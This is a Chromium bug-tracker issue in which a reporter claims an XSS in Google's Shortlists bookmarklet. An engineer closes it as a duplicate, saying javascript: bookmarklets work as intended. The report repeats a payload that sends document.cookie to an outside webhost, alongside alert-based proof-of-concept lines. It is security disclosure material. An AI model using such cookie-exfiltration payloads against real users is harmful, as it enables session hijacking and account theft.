New issue
Advanced search Search tips

Issue 727074 link

Starred by 1 user
Status: Duplicate
Merged: issue 657380
Owner: ----
Closed: May 2017
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: XSS Vulnerability (Vulnerability in browser)

Reported by cemyldrmmmmm@gmail.com, May 28 2017 


VULNERABILITY DETAILS

Hi Google Security Team

Site information

Link:https://www.google.com/shopping/shortlists/button?nt=nse

Site description:Drag this button to your bookmarks bar/toolbar in your web browser

Drag this code:javascript:(function() {var methName = '__SHORTLISTS_LOADER' + (new Date().getTime()); function loadShortlist() {window.gapi.load('shortlists', {callback: function() { gapi.shortlists.show(); }});}; if (!(window.gapi && !window.gapi.load)) {window[methName] = function() {loadShortlist(); try {delete window[methName]} catch (e) {window[methName] = null;}}; var s = document.createElement('script'); s.async = true; s.src = 'https://apis.google.com/js/api.js?onload=' + methName; document.getElementsByTagName('head')[0].appendChild(s);} else {loadShortlist();}})();

XSS Vulnerability available

1-Paylaod:alert(document.domain);

javascript:(function() {var methName = '__SHORTLISTS_LOADER' + (new Date().getTime()); function loadShortlist() {window.gapi.load('shortlists', {callback: function() { gapi.shortlists.show(); }});}; if (!(window.gapi && !window.gapi.load)) {window[methName] = function() {loadShortlist(); try {delete window[methName]} catch (e) {window[methName] = null;}}; var s = document.createElement('script'); s.async = true; s.src = 'https://apis.google.com/js/api.js?onload=' + methName; document.getElementsByTagName('head')[0].appendChild(s);} else {loadShortlist();}})();alert(document.domain);

2-Exploitation Payload:alert(window.location.href="https://speed000.000webhostapp.com/index.php?cookie="+ document.cookie);

javascript:(function() {var methName = '__SHORTLISTS_LOADER' + (new Date().getTime()); function loadShortlist() {window.gapi.load('shortlists', {callback: function() { gapi.shortlists.show(); }});}; if (!(window.gapi && !window.gapi.load)) {window[methName] = function() {loadShortlist(); try {delete window[methName]} catch (e) {window[methName] = null;}}; var s = document.createElement('script'); s.async = true; s.src = 'https://apis.google.com/js/api.js?onload=' + methName; document.getElementsByTagName('head')[0].appendChild(s);} else {loadShortlist();}})();alert(window.location.href="https://speed000.000webhostapp.com/index.php?cookie="+ document.cookie);


VERSION
Chrome Version: [Chromium version:61.0.3114.0] + [dev]
Operating System: [Windows 7 Ultimate[Service pack 1]

REPRODUCTION CASE
START XSS POC
1-Click on this link: https://sites.google.com/site/klasiktestyapmak

installed in the site:<iframe src="https://bubirtest.blogspot.de/2017/05/shortlistbutton.html" width="1800" height="1800">iframe</iframe>


2-Drag this button to your bookmarks bar/toolbar in your web browser

Payload(1):alert(document.domain);

javascript:(function() {var methName = '__SHORTLISTS_LOADER' + (new Date().getTime()); function loadShortlist() {window.gapi.load('shortlists', {callback: function() { gapi.shortlists.show(); }});}; if (!(window.gapi && !window.gapi.load)) {window[methName] = function() {loadShortlist(); try {delete window[methName]} catch (e) {window[methName] = null;}}; var s = document.createElement('script'); s.async = true; s.src = 'https://apis.google.com/js/api.js?onload=' + methName; document.getElementsByTagName('head')[0].appendChild(s);} else {loadShortlist();}})();alert(document.domain);


Exploitation Payload(2):alert(window.location.href="https://speed000.000webhostapp.com/index.php?cookie="+ document.cookie);

javascript:(function() {var methName = '__SHORTLISTS_LOADER' + (new Date().getTime()); function loadShortlist() {window.gapi.load('shortlists', {callback: function() { gapi.shortlists.show(); }});}; if (!(window.gapi && !window.gapi.load)) {window[methName] = function() {loadShortlist(); try {delete window[methName]} catch (e) {window[methName] = null;}}; var s = document.createElement('script'); s.async = true; s.src = 'https://apis.google.com/js/api.js?onload=' + methName; document.getElementsByTagName('head')[0].appendChild(s);} else {loadShortlist();}})();alert(window.location.href="https://speed000.000webhostapp.com/index.php?cookie="+ document.cookie);

3-Click to save to short list

Result:XSS Popup(sites.google.com) and Vulnerability in browser

Best Regards:Cem Yıldırım

Good work
xss.sites.google.com.png
267 KB View Download
example.html
114 bytes View Download

Comment 1 by elawrence@chromium.org, May 28 2017

Components: UI>Browser>Bookmarks
Mergedinto: 657380
Status: Duplicate (was: Unconfirmed)
Support for JavaScript: URLs in bookmarks is a Working-As-Intended feature in the browser; see https://www.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability-

Comment 2 Deleted

Comment 3 Deleted

Project Member

Comment 4 by sheriffbot@chromium.org, Aug 22

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment